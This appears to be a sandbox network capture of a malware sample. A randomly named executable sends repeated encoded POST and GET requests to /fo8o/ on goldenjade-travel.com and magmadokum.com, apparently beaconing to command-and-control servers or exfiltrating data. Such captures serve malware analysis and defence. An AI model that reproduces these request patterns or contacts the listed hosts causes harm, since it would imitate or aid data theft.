1	192.168.2.6	49901	116.50.37.244	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:28:55.770737886 CET	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: pnGX8L3p=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
Jan 15, 2025 08:28:56.643721104 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 15 Jan 2025 07:28:55 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49902	116.50.37.244	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:28:58.297305107 CET	832	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d Data Ascii: pnGX8L3p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
Jan 15, 2025 08:28:59.185817003 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 15 Jan 2025 07:28:58 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49903	116.50.37.244	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:29:00.839031935 CET	1845	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 [TRUNCATED] Data Ascii: pnGX8L3p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylT [TRUNCATED]
Jan 15, 2025 08:29:01.717227936 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 15 Jan 2025 07:29:00 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49904	116.50.37.244	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:29:03.375433922 CET	539	OUT	GET /fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:29:04.255281925 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 15 Jan 2025 07:29:03 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49907	85.159.66.93	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:29:22.661767006 CET	787	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75 Data Ascii: pnGX8L3p=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49908	85.159.66.93	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:29:25.204530001 CET	811	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d Data Ascii: pnGX8L3p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49909	85.159.66.93	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:29:27.735284090 CET	1824	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 [TRUNCATED] Data Ascii: pnGX8L3p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49910	85.159.66.93	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
